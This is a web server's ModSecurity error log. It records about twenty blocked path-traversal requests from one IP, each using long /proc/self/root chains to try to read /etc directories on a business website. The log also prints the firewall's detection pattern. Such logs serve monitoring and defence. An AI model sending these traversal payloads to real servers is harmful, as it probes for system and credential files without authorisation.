[Mon Mar 16 16:27:35.865013 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:36256] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZp1ajLEzk2WiQ-10kUAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:38.279426 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:36268] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZqdSswJuvopo3lOhwkgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:39.774979 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:54036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZq8_BxrYCr4hPDw_8cgAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:41.215329 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:54048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZrf9ocpUE4ed4uDwD2gAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:45.132606 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:54062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZsaTCbgAP5jq5Teg92QAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:47.867167 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:54066] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZs6QpVkWug9HeOt9H0AAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:53.094615 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:37000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZubysWC90G-1nBrBVswAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:54.480029 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:37002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZuqTCbgAP5jq5Teg92gAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:28:36.242324 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:37010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ5Er9dMAiw-8KANNYawAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:37.606076 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:53410] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ5bABkC4fWIHEf8EFEAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:38.863779 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:33522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ5rABkC4fWIHEf8EFFQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:40.219069 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:33530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ6LABkC4fWIHEf8EFGQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:41.401865 2026] [:error] [pid 29507:tid 140411733534464] [client 74.7.241.46:33542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ6Ur9dMAiw-8KANNYbAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:44.839385 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:33548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ7KQpVkWug9HeOt9H2gAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:46.126968 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:33564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ7rysWC90G-1nBrBVugAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:47.444072 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.241.46:33576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ78_BxrYCr4hPDw_8fgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:48.615322 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:60394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ8KQpVkWug9HeOt9H2wAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:49.986686 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:60404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ8Ur9dMAiw-8KANNYbQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:51.181011 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:60408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ86TCbgAP5jq5Teg94AAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:53.523602 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:60414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ9f9ocpUE4ed4uDwD6QAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:28:54.821382 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:60430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZ9s_BxrYCr4hPDw_8fwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
